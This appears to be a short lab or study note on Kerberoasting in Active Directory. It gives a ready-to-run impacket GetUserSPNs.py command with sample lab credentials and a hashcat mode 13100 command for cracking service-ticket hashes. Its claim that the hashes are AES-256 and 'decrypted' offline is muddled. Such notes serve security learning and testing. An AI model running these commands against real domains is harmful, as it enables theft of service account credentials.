<aside> 📌 Summary
</aside>
Kerberoasting is a technique used in cyber attacks to exploit weak service account passwords in a Microsoft Active Directory environment. Attackers target accounts with Service Principal Names (SPNs), requesting a Kerberos ticket-granting service (TGS) ticket for the service. They then use offline cracking to derive the service account's plaintext password from the ticket, as some service account passwords are stored as AES-256 encrypted hashes, which can be decrypted offline.
In normal conditions, this TGS is used to access a resource like a server. But there, we will try to crack the service account password hash.
Nice video which goes a bit deeper
Nice video which goes a bit deeper
Again with the https://github.com/fortra/impacket library we have a tool for this. This time, we will use GetUserSPNs.py.
GetUserSPNs.py ORB.local/lkisaka:Password1 -dc-ip 10.0.0.12 -request
<domain>/user:password-dc-ip well the IP of the domain controller-request to request a TGS
<aside>
💡 Note: this tool, at the opposite of some other tools, requires to use the full domain name. Here ORB.local.
</aside>
Find a little more about Hashcat password cracking here Password Cracking with Hashcat. This time we are cracking Kerberos hash of module 13100
hashcat TGS.hash -m 13100 /usr/share/wordlists/rockyou.txt